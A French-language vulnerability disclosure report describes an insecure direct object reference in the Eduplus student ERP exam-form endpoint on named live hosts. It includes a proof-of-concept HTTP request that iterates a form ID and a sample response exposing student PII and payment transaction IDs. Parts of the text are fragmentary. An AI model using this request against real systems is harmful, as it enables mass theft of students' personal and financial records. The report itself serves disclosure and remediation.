
# Rapport détaillé de recherche de vulnérabilité sur un IDOR dans Eduplus Student ERP, incluant l'analyse technique, la preuve de concept (PoC), l'évaluation de l'impact et les recommandations de remédiation.
Chercheur : Vinay Sharma
Ce rapport détaille une vulnérabilité de sécurité de haute sévérité identifiée dans la plateforme ERP étudiant Eduplus, plus précisément dans le portail d'apprentissage étudiant (learnerapi.pceterp.in). L'application souffre d'une Référence directe d'objet non sécurisée (IDOR) universelle sur le point de terminaison de soumission de formulaire d'examen, permettant à tout utilisateur authentifié (étudiant) de récupérer les données personnelles et financières sensibles de tout autre étudiant en manipulant les identifiants de formulaire.
Cette vulnérabilité permet une collecte de données à grande échelle des dossiers étudiants, y compris les informations personnelles identifiables (PII) et les pistes d'audit détaillées des transactions financières.
learnerapi.pceterp.in, learner.zealerp.in, , etc.learner.despu.edu.inPOST /ExamForm/viewSubmitExamFormCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)La vulnérabilité réside dans le point de terminaison viewSubmitExamForm. Le serveur s'appuie sur deux paramètres fournis par le client pour identifier l'enregistrement à récupérer :
{"formid": "XXXXX"}Router-Path: /view-pcu-exam-form/XXXXXformid demandé. En itérant sur les identifiants numériques, un attaquant peut accéder aux dossiers d'autres étudiants.Une requête POST standard au point de terminaison vulnérable avec un formid modifié renvoie des données étudiantes sensibles.
Requête :
POST /ExamForm/viewSubmitExamForm HTTP/2
Host: learnerapi.pceterp.in
Content-Type: application/json
Router-Path: /view-pcu-exam-form/28984
... (En-têtes authentifiés) ...
{"formid":"28984"}
Réponse (résumé des données divulguées) :
{
"status": "200",
"examFormname": "B.Tech - Sem VI - Regular",
"receipt_no": "REC/2023/54321",
"feespaiddate": "2023-10-15",
"ispaymentdone": {
"username": "[email protected]",
"received_amount": "1500.0",
"updation_ip_address": "103.x.x.x",
"erp_transaction_id": "ERP_998877",
"bank_transaction_id": "BANK_ABC123",
"paymentgateway_transaction_id": "PG_XYZ789",
"learner": {
"id": "12345"
}
}
}





Téléversement de Idorpoc.mp4…
L'exploitation réussie de cette vulnérabilité permet :
formid demandé appartient au learnerid associé à la session active. Ne jamais faire confiance aux paramètres formid ou Router-Path sans validation par rapport au jeton de session authentifié.